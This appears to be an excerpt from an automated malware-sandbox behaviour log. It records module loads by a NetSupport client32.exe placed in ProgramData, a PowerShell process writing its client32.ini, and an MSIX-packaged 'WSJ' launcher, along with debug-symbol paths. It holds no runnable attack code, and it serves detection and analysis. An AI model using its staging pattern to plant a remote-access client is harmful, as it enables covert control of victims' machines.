                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: fwbase.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: fwpolicyiomgr.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: winhttp.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: mswsock.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: winnsi.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: urlmon.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: srvcli.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: profext.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: ntmarta.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: rasadhlp.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\ProgramData\netsupport\client\client32.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: concrt140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coremessaging.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dcomp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.applicationdata.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rometadata.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositorycore.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windowmanagementapi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textinputframework.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: inputhost.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ntmarta.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxgi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.background.systemeventsbroker.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: biwinrt.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mrmcorer.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositoryclient.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d11.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d10warp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxcore.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d2d1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dwrite.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47mrm.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textshaping.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140_app.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_1_app.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_app.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.controls.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.shell.servicehostbuilder.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: execmodelproxy.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rmclient.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uiamanager.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.core.textinput.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.immersive.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dataexchange.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: winrttracing.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.globalization.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: directmanipulation.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: daxexec.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: fltlib.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: container.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profext.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appcontracts.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cdprt.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cdp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: umpdc.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dsreg.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxpackaging.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: opcservices.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: xmllite.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msxml6.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptxml.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: webservices.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msasn1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptowinrt.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: gpapi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certenroll.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certca.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dsparse.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dpapi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windowscodecs.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: threadpoolwinrt.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dwmapi.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ninput.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msvcp140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140_1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: vcruntime140_1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: rometadata.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.storage.applicationdata.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: appcontracts.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.applicationmodel.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cdprt.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cdp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: umpdc.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: dsreg.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: capauthz.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: msasn1.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: ntmarta.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.staterepositorycore.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: windows.shell.servicehostbuilder.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exeSection loaded: ondemandbrokerclient.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: psfruntime64.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: daxexec.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: fltlib.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: container.dll
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                                    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\ProgramData\netsupport\client\client32.iniJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dll
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\netsupport\client\msvcr100.dllJump to behavior
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
                                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
                                    Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
